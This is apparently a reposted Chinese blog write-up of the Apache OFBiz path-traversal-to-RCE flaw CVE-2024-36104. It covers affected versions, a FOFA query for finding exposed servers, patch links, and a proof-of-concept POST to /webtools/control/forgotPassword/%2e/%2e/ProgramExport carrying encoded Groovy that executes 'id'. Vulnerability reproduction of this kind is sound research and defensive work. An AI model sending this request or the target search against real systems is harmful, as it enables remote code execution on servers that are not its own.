Apache OFBiz 路径遍历漏洞（CVE-2024-36104）

2024年6月6日22:10:53评论19 views字数 1018阅读3分23秒阅读模式

0x02 产品介绍

Apache OFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

0x03 漏洞威胁

Apache OFBiz 18.12.14之前版本存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径（请求URL中的特殊字符（如；、%2e）限制不当导致攻击者能够绕过后台功能点的过滤器验证，并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。

影响范围：

Apache OFBiz <= 18.12.14

0x04 漏洞环境

FOFA:

app="Apache_OFBiz"

Apache OFBiz 路径遍历漏洞（CVE-2024-36104）

0x05 漏洞复现

POC

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1Host: your-ipuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0Content-Type: application/x-www-form-urlencodedgroovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

Apache OFBiz 路径遍历漏洞（CVE-2024-36104）

0x06

批量脚本验证

0x07

修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接:

https://issues.apache.org/jira/browse/OFBIZ-13092

https://ofbiz.apache.org/download.html

原文始发于微信公众号（冷漠安全）：「漏洞复现」Apache OFBiz 路径遍历漏洞（CVE-2024-36104）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache OFBiz 路径遍历漏洞（CVE-2024-36104）

PyTorch 中存在严重的RCE漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

发表评论

在线咨询

微信